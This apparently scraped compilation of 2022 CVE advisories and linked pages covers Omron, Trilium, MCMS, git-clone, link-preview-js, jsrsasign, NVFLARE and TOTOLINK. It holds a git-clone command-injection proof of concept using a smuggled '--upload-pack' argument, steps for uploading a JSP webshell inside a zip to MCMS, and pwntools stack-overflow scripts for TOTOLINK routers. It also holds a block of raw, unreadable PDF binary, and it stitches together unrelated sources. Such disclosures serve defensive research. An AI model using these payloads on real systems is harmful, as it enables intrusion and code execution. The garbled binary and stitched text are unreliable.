Use of hard-coded credentials vulnerability exists in Machine automation controller NJ series all models V 1.48 and earlier, Machine automation controller NX7 series all models V1.28 and earlier, Machine automation controller NX1 series all models V1.48 and earlier, Automation software 'Sysmac Studio' all models V1.49 and earlier, and Programable terminal (PT) NA series NA5-15W/NA5-12W/NA5-9W/NA5-7W models Runtime V1.15 and earlier, which may allow a remote attacker who successfully obtained the user credentials by analyzing the affected product to access the controller.

%PDF-1.7 %���� 530 0 obj <> endobj 547 0 obj <>/Encrypt 531 0 R/Filter/FlateDecode/ID\[<1D667602CB60E44EB1F84521BEC453B4>\]/Index\[530 40\]/Info 529 0 R/Length 89/Prev 239826/Root 532 0 R/Size 570/Type/XRef/W\[1 3 1\]>>stream h�bbd\`\`\`b\`\`�"��HƓ �i �d1�N��!�r��r�y;X�N��7o��� ����10120-���8��Wod�T endstream endobj startxref 0 %%EOF 569 0 obj <>stream �'<�M&%\_�p%��0��|4�v�b�:���V�R7��9���ּQ7�2 ���QՆ}�l�ޢ�LV��3���:�|��<�ܝuũ(�m���Ȅq/,�9������~�N�R ��� ƌ� �j���ʘ��f��B\`�q¯��z|Y����N$t/�͚�؛�\_A�� endstream endobj 531 0 obj <>>>/Filter/Standard/Length 128/O(��������Q�Ro,�\\)�C��19+���J)/P -1324/R 4/StmF/StdCF/StrF/StdCF/U(N��dS.3�C�A�>)/V 4>> endobj 532 0 obj <>/Metadata 17 0 R/PageLayout/SinglePage/Pages 528 0 R/StructTreeRoot 26 0 R/Type/Catalog/ViewerPreferences 548 0 R>> endobj 533 0 obj <>/MediaBox\[0 0 595.32 841.92\]/Parent 528 0 R/Resources<>/Font<>/ProcSet\[/PDF/Text/ImageB/ImageC/ImageI\]>>/Rotate 0/StructParents 0/Tabs/S/Type/Page>> endobj 534 0 obj <>stream Ur!���\`�����\`�j!\*����,S�N��1�m������'zS��BƠ �B�ԭ#����c\\�n�A�x=7�Y��֝v��z�<�A����'�@�"�0�\`��h������o�q�4H�Q�k҂bf����K&J��û,׈M>���U$���Q­ޝy�o���醈�8b<�\]�p Y�@��ֻQ�=��!��>@ɦ��wL��%ώC�a/��uO;���ԃ���"y����C��l'M�����fdH|�����\*:.�D��5���u�1H�=g����"�b��q=}NY�#���>\[|��G �p���Bf�׾D�L{���{\[���M�\`�BT$����3�k��U �B֮,�\_��ɽ���ِq��ɻ��z�\\\[x�\_�S)o��.�ٙn֪h��xC0��@S��R�Y֌��N���i�n�G��Z�Xb٠s� �|�v��P;VU��~��������4�7 �5�G��;�=bW$kĔ�5e�������!�M�(��\*�h�����1'�Ď��&��>��6��)"�0+e���~�"�?�tXa}"��v�<3I \[�$�PO�n|.�J�V��~��U� \*��5�@ .9�a�hsUw/vh��W�o���7n��~���=X.$@��DK#��=Yd��:���HMj�ry��� z� �~C�"DY�9��|�vp�y�L���σi�����P�N;ȧñv.\[�s�X�2�Se��'�7E�?͗#���(p$�W���(F�G�e�&w0HQEU��{O���z(�����(��cP��1\\K)�d���?\_x؊!�1�i�ĴTro�õIJAJԨ�&����C����D@\*1�3 �y�i�"��׽�-�SD�9���լ�\`�?��=�"���\]\]�1T��ߛCk ���˞���%�����!�(S����y�g�B��7��M��W�s���\*#���\_Nc endstream endobj 535 0 obj <>stream ��/�v5��=w��oz���Z��.b9v�Zs�2�P�x$����R�p %���<�\*���ʵ������eȏ�,i��/�Û�=�\\��B�����/�C�Z�ۢ��EJs����d\`D��5�v �mi�\[}op\]EIQDY@5~�)�P�k����J�ݗ���F>fS9����������ԩ�權1u���ם-�\*lnl�;89���=\`��������ݘ\_��j�z$x\\�l\\������A�?W��("����#A��E�D�y5�so⩂�^�+�v��)�et'�9'lM\\a���~�L2�c/��.���l Ϟ�B������eQ�5�-n��ӳ���v��5��u�-�����dx k1��f����e���GQL��A�A���,�N8pD^���F��4��Q�ʇ�=��㖣�/��Ɔ���4Ľ��#����=Gڛ����#-�����󅞦��D�������hk�yH�m�\]���f/\_U��� fg޵K;\*y�';�c�qD\]�t�����P����2ՑO����f��0n(,u����!���,�ʸ�\_\\p�2�n�z�}a endstream endobj 536 0 obj <>stream k��B�!-�\*��2�My�K&oe�q!����R9��5���J\\n�^r!�ݣ0�|�j.�Pn �܋;?��mM���z���,,j'�� ��E�=ut\_<+9�V�$����!���W!�������?���P�"�0�3H�!U~���Y,� +����1&��H�$��\[��'L�7�#�+\*f�� �2TM�Ӱ�~p�������ozڃ��i��~���f�r��x�|�O|��G��DJ�q8B:����3���r�2��җV>�Ff�� �ԣ��dm��z�L�ej�3~ �K����|f�N�5�(Ν\[�O�&�W��\`?���1T?o�\*��Jeg��!pQ��GI����3\_�nĉ# endstream endobj 537 0 obj <>stream ,U�0��Re�۸�� ���h$�����\]q����p�l'�9V����� �~���J�"lt.O�L�N�#\]�.��J/'!�\_=\[��gG�^g�͑��/�&�y���ѡ�%j�1їx�ۼ�)�zQ��w=WԠ&۬��!S��}��FH� ����ڹ\\��x&\\�|�~�V�om ;�\[V�JC�虶$���U#��5��t�i��� �Ƃ�r�i"!%�Ӳ}��w�9��? ��#���Vn����ͯp�H���%\`VƦ=�UuJ2��߯�, !��ַR4�j�St;\*G�����#��\*I�0/�\`��ĵ��#�E!��s�J�L<�\*Xnlԭ�L�i.�3aN���)\[���Y����Iϯ�{��/�#�:7 �K%���6��u��rG�;\_����ܿU�VT�Ts��~ڋ�r���������-0����#��F"��s4��)m���^�@d�,�߻۪k.��z�;t����Ps4c�+���Jj�敻ء�{�v9��0�/�w������m%��y/LX̺��wvM�,ƚ�Y��n�t����@ں'�In�P���m�qy$I1��+��{H�ݗv�t�zr�I��TsQS�Ze���{\[V���\`Cy�p�m��5;�sK � endstream endobj 538 0 obj <>stream �)'�w+�n�9\[a��e܄BD�??�>���E\*- �;��~�Q\]���0U�Ff��&6� P<\]��g\[�̯��K��F�,����aCIC|��+�}&\[/U� ,��;�X��x"��T�'��F\_\[��'!LU�����K�^T@ ��x1S�b�yז6�MTÂ�j�k���z���A�\`n�cr�K�@��@���G毨O�nT������b����\\�g�a4�x� ?~����4� �����"�B����ay��W� �g�9�X\`�\`t�t��$r~�jMe��t��L2F�� �T\_��\` �e�moI=��N=рW�\`\`?�o:��Lbc�=�(�#-��s�!����H��Vy�j�a��iV��QB�s#�#߀��-��}�;�����O�@�֋� u�������\`�'aR���HVjī��Ҡ�D��߬^���{���a�%ϔ�!���!���e���gyx�~K<�J�y���رk�b7d�D�S�=/摕<F�\*&�<�Qf%���j3�}��ً�(���t�t9��A�\]�iok,����Z���\]TP \]%)8Q0�\`����,��6�z����$�,�A��:K�z� endstream endobj 539 0 obj <>stream \\��k�F��~l���E���}íX��w3nv��p\_\_��\]f��@Og�$L��禧7�A�%����F�"UO�A�r���´��/��U6�\[�t���X���P>q�,�����^����h������Q�d:�(F��^�1�P��.�1�F!J�(�?�EUJ��^���'\[��d�E6<�ɽ�m&m?��W�κt�oK��������pF�=ou�A�HA ��̚����\_� j\_�8q�ha���F��u�{�^;�\`qޙ����=��KhvOd�eE��P������6�z�u5JJ�T��N ��i�� �{�� 9�Ȁ˽( ��N��@Mv��\*8 �}���oM1�oT<(�\_��>��Ku�E���c%����� W폑j��=�3��k��c>+0��\_���k<�.��3K;&�R'bÍ���s�8�QZ.޷IU{qFq��D�{�9QI��Q����aH�!��Ě��jO� z�P��1�|r�9�\_zT�\*�4���P�M+��7��}�E�|G\].�\`���flFaEM� .�nH�qs"? endstream endobj 540 0 obj <>stream �9��I��$IZ}±pz��3���'��q/h�(���RI�3���e�zY��X�蓻K.�J�����\`�i#Yi��hn�L-B��ph �㎊(��/F�MS�y\]o\]�:�\_R�\`������H�\*���x�β�-�hi��W�G���Y���<��;.'��&W�� G��ȲC��4�S;i��͘���2�Zcy�V����GXcP��M��G�'�(~��C�4���+xzW�����6���;kQ�3��a\]�����H,���#�e/ 6�sGw�8S�<�� �M2�W�ٞ6�g@w�I�I�ɶ�����'U�{�r��P��6d�S��A�����$e�41����л�\]�s}�B�������LC\]m�&��E����2�?��;���/��Dp��\`�P ���I'�H'\[ ��?r��+4�\\ø>��"��� ��9�bg\*)@�r��{��U�U�}�L��������c����0�x'�$ �@��9cV��{t�裂%эEp�$}�Eϵ=��{��Kbx:�|�-!{l��n�ܽ�Z"Z�U�i�F?j�4�k�7��\`T̓��A95��\\x�޳ ���$��)���ص� endstream endobj 541 0 obj <>stream ką�z����M�\]7r����eWze�4�:@V8;a7��^�����;��G���>��o�$֝�����?; ���e溓�}���{'{����꼙���O���M%�o��D��YR|��L�Сv�&'.W� X#�=�����r��O!�h���ֲ����f���Uo�g�v�Y�2�F�pݷgl�3t?⚔p��\_a����4�����u\[�@���T�r� Pj��+e�4\\R~+�3(�8Q|$J��^\*8n���s�$���kT@|Yʲ��{�Y�}\\��i���}����"U��{�)m��E�3}Z\*�P� .��3�$"@�(Ës4�o�،�᧏ގ:��Wv��P������;C3K �Hd�D�������n��\]�2q��d���ow�e����%r�1c)e���<����1�6������� xȾt�\`)G�S�C�~��Hiʕ#tճQ<�C�/S���+�=�+�Z6�D��{$�͠i���=�0P�f�l�Kf��o�������:l�Y�o

CVE-2022-34151

Cross-site Scripting (XSS) - Reflected in GitHub repository zadam/trilium prior to 0.52.4, 0.53.1-beta.

@@ -39,9 +39,9 @@ function register(router) { addNoIndexHeader(note, res);  
if (note.hasLabel('shareRaw') || \['image', 'file'\].includes(note.type)) { res.setHeader('Content-Type', note.mime); res.setHeader('Content-Type', note.mime) .send(note.getContent());  
res.send(note.getContent()); return; }  
@@ -83,7 +83,9 @@ function register(router) { const note \= shaca.getNote(noteId);  
if (!note) { return res.status(404).send(\`Note '${noteId}' not found\`); return res.setHeader("Content-Type", "text/plain") .status(404) .send(\`Note '${noteId}' not found\`); }  
addNoIndexHeader(note, res); @@ -98,7 +100,9 @@ function register(router) { const note \= shaca.getNote(noteId);  
if (!note) { return res.status(404).send(\`Note '${noteId}' not found\`); return res.setHeader("Content-Type", "text/plain") .status(404) .send(\`Note '${noteId}' not found\`); }  
addNoIndexHeader(note, res); @@ -122,13 +126,17 @@ function register(router) { const image \= shaca.getNote(req.params.noteId);  
if (!image) { return res.status(404).send(\`Note '${req.params.noteId}' not found\`); return res.setHeader('Content-Type', 'text/plain') .status(404) .send(\`Note '${req.params.noteId}' not found\`); } else if (!\["image", "canvas"\].includes(image.type)) { return res.status(400).send("Requested note is not a shareable image"); return res.setHeader('Content-Type', 'text/plain') .status(400) .send("Requested note is not a shareable image"); } else if (image.type \=== "canvas") { /\*\* \* special "image" type. the canvas is actually type application/json \* special "image" type. the canvas is actually type application/json \* to avoid bitrot and enable usage as referenced image the svg is included. \*/ const content \= image.getContent(); @@ -141,7 +149,9 @@ function register(router) { res.set("Cache-Control", "no-cache, no-store, must-revalidate"); res.send(svg); } catch(err) { res.status(500).send("there was an error parsing excalidraw to svg"); res.setHeader('Content-Type', 'text/plain') .status(500) .send("there was an error parsing excalidraw to svg"); } } else { // normal image @@ -159,7 +169,9 @@ function register(router) { const note \= shaca.getNote(noteId);  
if (!note) { return res.status(404).send(\`Note '${noteId}' not found\`); return res.setHeader('Content-Type', 'text/plain') .status(404) .send(\`Note '${noteId}' not found\`); }  
addNoIndexHeader(note, res);

CVE-2022-2290: set correct content type for error messages · zadam/trilium@3faae63

The package link-preview-js before 2.1.17 are vulnerable to Server-side Request Forgery (SSRF) which allows attackers to send arbitrary requests to the local network and read the response. This is due to flawed DNS rebinding protection.

**Server-Side Request Forgery in link-preview-js**

Moderate severity GitHub Reviewed Published Jul 2, 2022 • Updated Jul 6, 2022

GHSA-h9cw-7g8j-h66h: Server-Side Request Forgery in link-preview-js

MCMS v5.2.8 was discovered to contain an arbitrary file upload vulnerability.

1.代码分析  
从铭飞官网https://gitee.com/mingSoft/MCMS把源码考下来之后  
经过审计找到上传点，form.ftl这里有个文章缩略图上传点看他有没有做过滤然后根据action找到上传接口  

经过查找在FileAction.class这里只判断了../防止目录跳跃，继续往下看点击继承的那个类  
  
BaseFileAction.class发现他这做了后缀判断接着看是在哪调用的过滤  
  
我们复制denied全局搜索，application.yml发现他是在配置文件里写了过滤，过滤了 exe,jsp,jspx,sh那说明除了这四个其他都可以上传  
  
  
接着看看他有没有可利用的接口来实现上传jsp，经过查找TemplateAction.class里有个专门解析zip的接口。那么结合上面的过滤 可以上传zip，可以通过zip包含jsp恶意文件上传上去 然后调用这个接口去解析zip并解析树jsp并访问。  

2.根据分析的代码操作  
找到文章缩略图地址，点击上传zip  
  
  
上传上去之后右键复制图片路径，然后通过上面分析的调用解析zip的接口fileUrl=刚刚上传的zip回车提示执行成功  
  
  
  
之后查看上传目录的地方，发现成功解压了在通过路径访问aaaaa.jsp，然后利用哥斯拉去连接他发现执行成功  
  
  

.

CVE-2022-31943: Mcms  v5.2.8文件上传漏洞 · Issue #95 · ming-soft/MCMS

All versions of package git-clone are vulnerable to Command Injection due to insecure usage of the --upload-pack feature of git.



git-clone describes itself as a tool to clone a git repository

Resources:

*   Project's GitHub source code: https://github.com/jaz303/git-clone
*   Project's npm package: https://www.npmjs.com/package/git-clone

git-clone receives about 230,000 downloads a week so this report should probably be timely.

**Background on exploitation**

I'm reporting a Command Injection vulnerability in git-clone npm package.

A use of the --upload-pack feature of git is also supported for git clone, and allows users to execute arbitrary commands on the OS.

The source code attempted to mitigate user input concatenation as shown here: https://github.com/jaz303/git-clone/blob/master/private/util.js#L16-L17 with the following:

	args \= args.concat(userArgs);
	args.push('--', repo, targetPath);

However, the user arguments are first added to the command being executed, and only then the double dash is added. Effectively, creating the following array values passed to the git spawned command here https://github.com/jaz303/git-clone/blob/46e27e0a60261f22ff70ed5f29d72f5d43b8aeab/private/impl.js#L10:

    [
      'clone',
      '--upload-pack=touch /tmp/pwn2',
      '--',
      'file:///tmp/zero12345',
      '/tmp/example-new-repo'
    ]
    

If a user controls the options object provided to the clone() function through the options.args array, then they can inject commands to run when the clone function is called.

**New exploit**

Install git-clone@0.2.0, which is the latest.

Run the following code:

const clone \= require('git-clone')
const repo \= 'file:///tmp/zero12345'
const path \= '/tmp/example-new-repo'
const options \= {
	args: \[
	'--upload-pack=touch /tmp/pwn2'
\]}
clone(repo, path, options)

Observe a new file created: /tmp/pwn2

**Author**

Liran Tal

CVE-2022-25900: Command Injection vulnerability in git-clone@0.2.0

The package link-preview-js before 2.1.16 are vulnerable to Server-side Request Forgery (SSRF) which allows attackers to send arbitrary requests to the local network and read the response. This is due to flawed DNS rebinding protection.



New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

keworr opened this issue

May 25, 2022

· 17 comments · Fixed by #117

Closed

**SSRF #115**

keworr opened this issue

May 25, 2022

· 17 comments · Fixed by #117

**Comments**

**Describe**  
There is a way to bypass your regex to validate private & local networks.

If we use http://127.0.0.1/ or http://localhost/ to link preview, we don't see it (Error: link-preview-js did not receive a valid a url or text), but if we use a domain that resolved to 127.0.0.1, we can. For example: localtest.me resolved to 127.0.0.1 (localhost), i.e. If you 'curl localtest.me', you'll see your localhost.

Similarly we can read any other private & local address, any port.

**To Reproduce**  
Steps to reproduce:

1.  Find domain that resolved to private address with reverse ip lookup or use localtest.me (127.0.0.1) or devhead.net (127.0.0.1 + 192.168.1.1 + 192.168.0.1).
2.  Write it to getLinkPreview.
3.  Done. You see your local domain.

**Screenshots**  

Which version are you using? At some point, someone submitted a PR to patch redirections, by default it should not follow any.

I don't quite get what is the issue though... these sites seem to register the loopback address on DNS level. Even curl returns the data of the directory, then it also means that curl has an SSRF vulnerability?

The regex is not a security feature, it's only a way to detect links in the text. As stated, the library does not follow redirections by default.

#105

But you accepted same SSRF here - #105?

I really don't understand what you mean. In that issue, the author submitted a PR not to follow redirects, which is now the default behavior. The same author complained that it is possible to pass the regex with a localhost url, like I said, the regex is not meant to be a security feature, it is only there for link detection. Once the url is passed to the fetch library, there is no way to re-validate the url (even if the regex was meant to do that, which it is not) . On the other hand, I already showed you that curl also has this same behavior, because the domains you send use the localhost address on a DNS level, so that means (as far as I can see) that there is no SSRF vulnerability, this is just the expected behavior.

Copy link

Author

** **keworr** commented May 25, 2022 •**

Redirects were disabled in that issue because it allows to read local hosts, right?  
And my way also allows to read local hosts?  
idk what is different

Yes, curl by default allow same, also curl allow requests as curl file:///etc/passwd by default, SMB requests, FTP, etc. Also e.g. any browsers allow redirects by default, but you disabled it.

I just saw that issue and thought that SSRF is sensitive here, if not - ok.

redirects were disallowed not because localhost, but because redirections are by default insecure. Your way allows to reach localhost, not because the library is doing something wrong, but because the domains you provided loopback to localhost **on the DNS level**, they are not intercepting the request and redirecting, they are straight up returning 127.0.0.1 when their DNS address is resolved. There is nothing I can do about that.

@ospfranco first of all i install lastest version of package for testing my local machine and cant see followRedirects option in source could there be a problem with npm? can you check please

Second of all i agree with @keworr this vulnerability is called DNS pinning (or DNS rebinding) and it allow to bypass all control mechanism on DNS level but library has proxy option and the purpose of proxy is to fix such DNS level problems and vulnerabilities. But if we want the library to prevent such DNS level attacks as well we can fix this by dns lookup before make request

hi @AbdurrahmanA, you are right I published a new version of the package, probably some cache was left on my machine when I published one of the newer versions. Thanks a lot!

Thanks a lot for the explanation, that was what I needed. This StackOverflow answer seems to suggest there is no way to resolve the DNS address from JavaScript, seems like the solution is to self-host a proxy?

Actually if we added that kind of option to library it would be great i would love have that option. We can easily do nslookup for server side, for client side we can use https://dns.google/resolve?name=localtest.me or that option wont be available for client side. By the way this library should not be in client side it wil get lots of CORS error 😁

If you mean hardcoding a DNS service, not a fan (and especially google's), but maybe an option to pass a DNS resolver if one chooses to do so.

The library will face CORS errors on websites, on React Native, Cordova, etc it works just fine

We can easily set DNS resolver for Node js side, but if we do this using native dns library, will it be a problem for client-side users? otherwise we should make an online dns resolver option right?

I'm still not sure if the DNS resolver should always be there, just from a latency point of view, it might affect people who have already deployed this. But just passing a function that resolves the host might be enough for us to check against common attacks?

    getLinkPreview('some text with a link', {
      // Must resolve the url host, internally checks for loopbacks and common SSRF attacks
      resolveDNSHost: (url: string) => Promise<string>
    })
    

On the other hand, I don't think this would be an issue on mobiles. Almost nobody has a server running on the phone for the loopback address to be considered dangerous. Maybe conditionally importing/requiring the DNS resolver on node is enough...

Sorry for late response, Yes we just need the DNS resolver on node can we do that and also, we need to warn people about common SSRF vulnerabilities and make sure people understand what this library does.

Most people won't care 🤷‍♂️ they barely read the CORS warning. But I'll try to find some time in the coming weeks to add the option, otherwise PRs are welcome

Great to hear that, i could also do it if i have time, i will inform you 👌

CVE-2022-25876: SSRF · Issue #115 · ospfranco/link-preview-js

The package jsrsasign before 10.5.25 are vulnerable to Improper Verification of Cryptographic Signature when JWS or JWT signature with non Base64URL encoding special characters or number escaped characters may be validated as valid by mistake.

 Workaround:
Validate JWS or JWT signature if it has Base64URL and dot safe string before executing JWS.verify() or JWS.verifyJWT() method.



1.  Releases
2.  10.5.25

*   Changes from 10.5.24 to 10.5.25 (2022-Jun-23)
    *   src/jws.js
        *   JWS.verify and JWS.verifyJWT
            *   CVE-2022-25898 SECURITY FIX:  
                verify and verifyJWT may accept signature with special characters  
                or \\number characters by mistake.  
                Please see security advisory:  
                GHSA-3fvg-4v2m-98jf
    *   src/base64x.js
        *   function isBase64URLDot added
    *   test/qunit-do-jwt-veri.html

CVE-2022-25898: Release CVE-2022-25898 Security fix in JWS and JWT validation · kjur/jsrsasign

NVFLARE, versions prior to 2.1.2, contains a vulnerability in its PKI implementation module, where The CA credentials are transported via pickle and no safe deserialization. The deserialization of Untrusted Data may allow an unprivileged network attacker to cause Remote Code Execution, Denial Of Service, and Impact to both Confidentiality and Integrity.

**Impact**

NVFLARE contains a vulnerability in its PKI implementation module, where The CA credentials are transported via pickle and no safe deserialization. The deserialization of Untrusted Data may allow an unprivileged network attacker to cause Remote Code Execution, Denial Of Service, and Impact to both Confidentiality and Integrity.  
All versions before 2.1.2 are affected.

CVSS Score = 9.8  
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Patches**

The patch will be included in nvflare==2.1.2

**Workarounds**

Replace pickle serialization with JSON and change the code accordingly

Additional information  
Issue Found by: Oliver Sellwood (@Nintorac)

CVE-2022-31604

TOTOLINK T6 V4.1.9cu.5179_B20201015 was discovered to contain a stack overflow via the desc, week, sTime, eTime parameters in the function FUN_004133c4.

The vulnerability exists in the router's WEB component. /web_cste/cgi-bin/cstecgi.cgi FUN_004133c4 (at address 0x4133c4) gets the JSON parameter desc, week, sTime, eTime, but without checking its length, copies it directly to local variables in the stack, causing stack overflow:

from pwn import \*
import json

data \= {
    "topicurl": "setting/setParentalRules",
    "addEffect": "0",
    "mac": "12:34:56:78",
    "desc": 'A'\*0x400,
    "week": 'A'\*0x400,
    "sTime": 'A'\*0x400,
    "eTime": 'A'\*0x400
}

data \= json.dumps(data)
print(data)

argv \= \[
    "qemu-mipsel-static",
    "-g", "1234",
    "-L", "./root/",
    "-E", "CONTENT\_LENGTH={}".format(len(data)),
    "-E", "REMOTE\_ADDR=192.168.2.1",
    "./cstecgi.cgi"
\]

a \= process(argv\=argv)
a.sendline(data.encode())

a.interactive()

CVE-2022-32051: IoT-vuln/Totolink/T6-v2/2.setParentalRules at main · d1tto/IoT-vuln

TOTOLINK T6 V4.1.9cu.5179_B20201015 was discovered to contain a stack overflow via the cloneMac parameter in the function FUN_0041af40.

The vulnerability exists in the router's WEB component. /web_cste/cgi-bin/cstecgi.cgi FUN_0041af40 (at address 0x41af40) gets the JSON parameter cloneMac, but without checking its length, copies it directly to local variables in the stack, causing stack overflow:

from pwn import \*
import json

data \= {
    "topicurl": "setting/setWanCfg",
    "proto": "0",
    "staticIp": "192.168.2.1",
    "staticMask": "255.255.255.0",
    "staticGw": "192.168.2.1",
    "staticMtu": "0",
    "cloneMac": "A"\*0x400
}

data \= json.dumps(data)
print(data)

argv \= \[
    "qemu-mipsel-static",
    "-g", "1234",
    "-L", "./root/",
    "-E", "CONTENT\_LENGTH={}".format(len(data)),
    "-E", "REMOTE\_ADDR=192.168.2.1",
    "./cstecgi.cgi"
\]

a \= process(argv\=argv)
a.sendline(data.encode())

a.interactive()

Tag

#js